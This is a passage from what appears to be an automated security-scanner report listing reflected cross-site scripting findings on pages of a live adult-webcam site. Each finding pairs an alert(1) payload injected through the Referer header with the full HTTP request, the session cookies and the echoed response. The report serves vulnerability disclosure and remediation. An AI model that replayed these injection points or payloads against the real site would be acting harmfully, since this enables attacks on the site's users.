<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=abdb3'-alert(1)-'17f2cec9909&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.956. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e389'-alert(1)-'41c0351c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5e389'-alert(1)-'41c0351c2c2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:31 GMT
Connection: close
Content-Length: 33186
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/&rf=http://www.google.com/search?hl=en^q=5e389'-alert(1)-'41c0351c2c2&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.957. http://imlive.com/live-sex-chats/caught-on-cam/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9792b'-alert(1)-'ba39155c916 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/caught-on-cam/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9792b'-alert(1)-'ba39155c916

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 25658
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
xt/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/&rf=http://www.google.com/search?hl=en^q=9792b'-alert(1)-'ba39155c916&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.958. http://imlive.com/live-sex-chats/couple/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67099'-alert(1)-'bb279cc6b57 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=67099'-alert(1)-'bb279cc6b57

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:29 GMT
Connection: close
Content-Length: 113880
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/&rf=http://www.google.com/search?hl=en^q=67099'-alert(1)-'bb279cc6b57&qs=cat=1^roomid=12&qs=cat=1^roomid=12&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.959. http://imlive.com/live-sex-chats/fetish/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8877f'-alert(1)-'f0d179f333a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8877f'-alert(1)-'f0d179f333a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:07 GMT
Connection: close
Content-Length: 213457
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/&rf=http://www.google.com/search?hl=en^q=8877f'-alert(1)-'f0d179f333a&qs=cat=1^roomid=13&qs=cat=1^roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.960. http://imlive.com/live-sex-chats/fetish/categories/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c608e'-alert(1)-'0606a3ceeb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=c608e'-alert(1)-'0606a3ceeb1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:36 GMT
Connection: close
Content-Length: 24548
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/&rf=http://www.google.com/search?hl=en^q=c608e'-alert(1)-'0606a3ceeb1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att
...[SNIP]...

4.961. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bee'-alert(1)-'306a0aabfe1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=96bee'-alert(1)-'306a0aabfe1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 72576
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
script">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/&rf=http://www.google.com/search?hl=en^q=96bee'-alert(1)-'306a0aabfe1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.962. http://imlive.com/live-sex-chats/free-sex-video/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c58'-alert(1)-'c21d7feff7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=38c58'-alert(1)-'c21d7feff7f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 51719
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/&rf=http://www.google.com/search?hl=en^q=38c58'-alert(1)-'c21d7feff7f&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.963. http://imlive.com/live-sex-chats/gay-couple/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 375ba'-alert(1)-'7a67cb13099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

